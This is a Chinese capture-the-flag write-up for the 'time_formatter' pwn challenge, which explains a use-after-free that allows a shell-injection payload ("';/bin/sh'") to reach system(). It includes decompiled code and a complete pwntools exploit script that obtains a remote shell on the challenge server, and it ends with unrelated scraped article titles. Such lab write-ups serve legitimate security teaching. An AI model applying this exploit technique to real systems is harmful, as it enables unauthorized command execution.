攻防世界time_formatter writeup

UAF漏洞和命令注入。

前置知识

1、strdup函数

char * __strdup(const char *s)

{

   size_t  len = strlen(s) +1;

   void *new = malloc(len);

   if (new == NULL)

      return NULL;

   return (char *)memecpy(new,s,len);

}

strdup函数实现如上所示,strup函数拷贝字符串的副本到一块动态申请的内存中。

2、snprintf函数

snprintf函数原型:int snprintf(char *str, int n, char * format [, argument, ...])

str是目的字符串指针,snprintf从format中拷贝n个字符串到str中去,argument是参数。

3、getenv函数和setenv函数

getenv函数用来获取环境变量的值,setenv函数用来改变环境变量的值或者增加环境变量。

getenv函数原型:char * getenv(const char *name)

setenv函数原型:char * setenv(const char *name,const char * value,int overwrite)

name表示环境变量名,value表示环境变量的值,overwrite不为0表示可以修改和添加环境变量的值,overwrite为0表示环境变量已经有值,这时候value会被忽略。

程序分析

主调函数如下所示:

__int64 __fastcall main(__int64 a1, char **a2, char **a3)

{

  __gid_t v3; // eax

  FILE *v4; // rdi

  __int64 v5; // rdx

  int v6; // eax

  __int64 result; // rax

  v3 = getegid();

  setresgid(v3, v3, v3);

  setbuf(stdout, 0LL);

  puts("Welcome to Mary's Unix Time Formatter!");

  while ( 1 )

  {

    puts("1) Set a time format.");

    puts("2) Set a time.");

    puts("3) Set a time zone.");

    puts("4) Print your time.");

    puts("5) Exit.");

    __printf_chk(1LL, (__int64)"> ");

    v4 = stdout;

    fflush(stdout);

    switch ( str2int() )

    {

      case 1:

        v6 = set_time_format();

        goto LABEL_8;

      case 2:

        v6 = set_time();

        goto LABEL_8;

      case 3:

        v6 = set_time_zone();

        goto LABEL_8;

      case 4:

        v6 = print_time((__int64)v4, (__int64)"> ", v5);

LABEL_8:

        if ( !v6 )

          continue;

        return 0LL;

      case 5:

        exit();

        return result;

      default:

        continue;

    }

  }

}

set_time_format函数如下所示:

__int64 sub_400E00()

{

  char *v0; // rbx

  v0 = add();

  if ( (unsigned int)check_time_format(v0) )

  {

    ptr = v0;

    puts("Format set.");

  }

  else

  {

    puts("Format contains invalid characters.");

    delete(v0);

  }

  return 0LL;

}
char *add()

{

  __int64 v0; // rdx

  __int64 v1; // rcx

  char s[1024]; // [rsp+8h] [rbp-410h]

  unsigned __int64 v4; // [rsp+408h] [rbp-10h]

  v4 = __readfsqword(0x28u);

  __printf_chk(1LL, (__int64)"%s");

  fflush(stdout);

  fgets(s, 1024, stdin);

  s[strcspn(s, "\n")] = 0;

  return sub_400C26(s, (__int64)"\n", v0, v1);

}

set_time_zone函数如下所示:

__int64 sub_400E43()

{

  value = add();

  puts("Time zone set.");

  return 0LL;

}

exit_time函数如下所示:

signed __int64 __noreturn exit()

{

  signed __int64 result; // rax

  char s; // [rsp+8h] [rbp-20h]

  unsigned __int64 v2; // [rsp+18h] [rbp-10h]

  v2 = __readfsqword(0x28u);

  delete(ptr);

  delete(value);

  __printf_chk(1LL, (__int64)"Are you sure you want to exit (y/N)? ");

  fflush(stdout);

  fgets(&s, 16, stdin);

  result = 0LL;

  if ( (s & 0xDF) == 89 )

  {

    puts("OK, exiting.");

    result = 1LL;

  }

  return result;

}

print_time函数如下所示:

__int64 __fastcall print_time(__int64 a1, __int64 a2, __int64 a3)

{

  char command; // [rsp+8h] [rbp-810h]

  unsigned __int64 v5; // [rsp+808h] [rbp-10h]

  v5 = __readfsqword(0x28u);

  if ( ptr )

  {

    __snprintf_chk(

      (__int64)&command,

      2048LL,

      1LL,

      2048LL,

      (__int64)"/bin/date -d @%d +'%s'",

      (unsigned int)dword_602120,

      (__int64)ptr,

      a3);

    __printf_chk(1LL, (__int64)"Your formatted time is: ");

    fflush(stdout);

    if ( getenv("DEBUG") )

      __fprintf_chk(stderr, 1LL, (__int64)"Running command: %s\n", (__int64)&command);

    setenv("TZ", value, 1);                     // setenv函数这里添加环境变量

    system(&command);

  }

  else

  {

    puts("You haven't specified a format!");

  }

  return 0LL;

}

如果我们可以把构造语句,把command中的命令构造为';/bin/sh'(单引号是为了闭合语句中的单引号),通过system函数就可以getshell。但是如果在set_time_format函数中输入';/bin/sh'会被过滤掉,所以我们这里要利用uaf漏洞,首先通过set_time_format函数申请一块堆块,然后exit_time释放掉,通过set_time_zone重新将释放的堆块分配出来,构造语句来执行。

EXP

from pwn import *

from pwnlib import *

DEBUG=0

if DEBUG:

    io=process('./time_formatter')

else:

    io=remote('220.249.52.133',49902)

elf=ELF('./time_formatter')

puts_got=elf.got['puts']

puts_system=elf.got['system']

fgets_got=elf.got['fgets']

atoi_got=elf.got['atoi']

system_got=elf.got['system']

def launch_gdb():

    context.terminal=['gnome-terminal','-x','sh','-c']

    gdb.attach(proc.pidof(io)[0])

def set_time_format(content):

    io.recvuntil('> ')

    io.sendline(str(1))

    io.recvuntil('Format: ')

    io.sendline(content)

def set_time_format_err(content):

    io.recvuntil('> ')

    io.sendline(str(1))

    io.recvuntil('Format: ')

    io.sendline(content)

def set_time(Unix_time):

    io.recvuntil('> ')

    io.sendline(str(2))

    io.recvuntil('Enter your unix time: ')

    io.sendline(str(Unix_time))

def set_time_zone(zone):

    io.recvuntil('> ')

    io.sendline(str(3))

    io.recvuntil('Time zone: ')

    io.sendline(zone)

def print_time():

    io.recvuntil('> ')

    io.send(str(4))

def exit_time():

    io.recvuntil('>')

    io.sendline(str(5))

    io.recvuntil('Are you sure you want to exit (y/N)? ')

    io.sendline('N')

#launch_gdb()

content1='aaaa'

set_time_format(content1)

exit_time()

set_time_zone("';/bin/sh'")

print_time()

io.interactive()

time_formatter writeup的更多相关文章

  1. 2016第七季极客大挑战Writeup

    第一次接触CTF,只会做杂项和一点点Web题--因为时间比较仓促,写的比较简略.以后再写下工具使用什么的. 纯新手,啥都不会.处于瑟瑟发抖的状态. 一.MISC 1.签到题 直接填入题目所给的SYC{ ...

  2. ISCC2016 WriteUp

    日期: 2016-05-01~ 注:隔了好久才发布这篇文章,还有两道Pwn的题没放,过一阵子放上.刚开始做这个题,后来恰巧赶上校内CTF比赛,就把重心放在了那个上面. 这是第一次做类似于CTF的题,在 ...

  3. 参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp

    洒家近期参加了 Tokyo Westerns / MMA CTF 2nd 2016(TWCTF) 比赛,不得不说国际赛的玩法比国内赛更有玩头,有的题给洒家一种一看就知道怎么做,但是做出来还需要洒家拍一 ...

  4. 爱春秋之戏说春秋 Writeup

    爱春秋之戏说春秋 Writeup 第一关 图穷匕见 这一关关键是给了一个图片,将图片下载到本地后,打开以及查看属性均无任何发现,尝试把图片转换为.txt格式.在文本的最后发现这样一串有规律的代码: 形 ...

  5. 《安全智库》:48H急速夺旗大战通关writeup(通关策略)

    作者:ByStudent   题目名字 题目分值 地址 MallBuilder2 350 mall.anquanbao.com.cn MallBuilder1 200 mall.anquanbao.c ...

  6. iscc2016 pwn部分writeup

    一.pwn1 简单的32位栈溢出,定位溢出点后即可写exp gdb-peda$ r Starting program: /usr/iscc/pwn1 C'mon pwn me : AAA%AAsAAB ...

  7. We Chall-Training: Encodings I -Writeup

    MarkdownPad Document html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,ab ...

  8. We Chall-Encodings: URL -Writeup

    MarkdownPad Document html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,ab ...

  9. We Chall-Training: ASCII—Writeup

    MarkdownPad Document html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,ab ...

随机推荐

  1. Linux系统安装-C7

    1.安装部署操作系统 (1)创建虚拟机,加载系统镜像 (2)进入系统引导界面进行配置 补充:centos7系统网卡名称 默认系统的网卡名称为 eth0 eth1 –centos6 默认系统的网卡名称为 ...

  2. 『心善渊』Selenium3.0基础 — 19、使用Selenium操作文件的上传和下载

    目录 1.Selenium实现文件上传 (1)页面中的文件上传说明 (2)文件上传示例 (3)总结 2.Selenium实现文件下载 (1)Firefox浏览器文件下载 1)操作步骤: 2)文件下载示 ...

  3. Place the Robots 需要较强的建图能力

    Place the Robots 思路:在任意一个点格子放机器人,那么它所在的行和列被控制了.我们对每一行或每一列连续的空地(草地忽视)称之为块,给每一行和每一列的块标号, 每一行的快与每一列的快相交 ...

  4. Docker搭建EFK日志收集系统,并自定义es索引名

    EFK架构图 一.EFK简介 EFK不是一个软件,而是一套解决方案,并且都是开源软件,之间互相配合使用,完美衔接,高效的满足了很多场合的应用,是目前主流的一种日志系统. EFK是三个开源软件的缩写,分 ...

  5. scRNAseq benchmark 学习笔记

    背景 把早年没填完的坑(单细胞测序的细胞类型鉴别)给重新拾起来 其Github描述的基本情况: 作者并不对单个分类器进行说明,统一包装在benchmark工程里,还建立了docker容器 但说明了在s ...

  6. 用阻塞队列实现一个生产者消费者模型?synchronized和lock有什么区别?

    多线程当中的阻塞队列 主要实现类有 ArrayBlockingQueue是一个基于数组结构的有界阻塞队列,此队列按FIFO原则对元素进行排序 LinkedBlockingQueue是一个基于链表结构的 ...

  7. Docker:redis容器使用redis.conf启动失败,不报错

    查看redis.conf配置信息 daemonize no :redis默认是不作为守护进程使用的,这也就是说为什么在你不修改配置文件时直接使用redis-server /redis/redis.co ...

  8. Docker:银河麒麟系统/Ubuntu/arm64-离线安装Docker,配置自启

    下载离线包 离线安装包地址:https://download.docker.com/linux/debian/dists/stretch/pool/stable/ 注意: amd64是处理器64位 复 ...

  9. python之struct详解

    python之struct详解 2018-05-23 18:20:29 醉小义 阅读数 20115更多 分类专栏: python   版权声明:本文为博主原创文章,遵循CC 4.0 BY-SA版权协议 ...

  10. 在Xshell中文件内容显示乱码

    1.修改系统语言 支持中文 echo $LANG    查看系统语言  默认 en_US.UFT_8 vim /etc/locale.conf    修改配置文件 将LANG的值改为 zh_CN.UT ...